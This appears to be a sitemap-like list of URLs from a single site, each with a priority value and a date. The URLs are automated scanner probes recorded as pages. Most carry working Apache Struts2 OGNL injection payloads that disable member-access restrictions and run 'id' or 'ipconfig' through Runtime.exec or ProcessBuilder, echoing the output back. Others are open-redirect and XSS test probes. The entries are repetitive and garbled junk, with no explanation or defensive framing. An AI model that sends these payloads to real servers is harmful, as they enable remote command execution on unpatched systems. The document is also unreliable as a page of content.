http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html%3f=xsstest07b? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/fsm93823%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem74679?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?=osm51422%c0%beo1%c0%bco2a%90bcoem44272 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html%3f&redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?user.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27id%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html%3f=osm51422%ef%bf%bd%ef%bf%bdo1%ef%bf%bd%ef%bf%bdo2a%ef%bf%bdbcoem44272? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html%3f=fsm93823%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem74679? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html%3f%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html%3fuser.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html?&('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?&test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?&redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'ipconfig','-all'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f%24%7b100002-1%2b%27anonymous_%27%2b%27security_s2015_test%27%7d.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?&('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27id%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27ipconfig%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/xsstest?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html??debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?$%7b100002-1%2b'anonymous_'%2b'security_s2015_test'%7d.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?=http%3a%2f%2fwww.site120.cn%2fwebscantest_alert.html 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%27_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?&redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'ipconfig','-all'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27_002_product.html%3f&test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?user.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/fsm57339%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem43353?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/osm25982%e8%b0%b0o1%e5%85%b0o2a%e6%81%87coem32319?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?user.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html??debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27id%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'id'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27_002_product.html%3f&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3fuser.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27_002_product.html%3f&redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27_002_product.html%3fuser.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?xsstest 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f=http%3a%2f%2fwww.site120.cn%2fwebscantest_alert.html? 0.5 2024-04-15 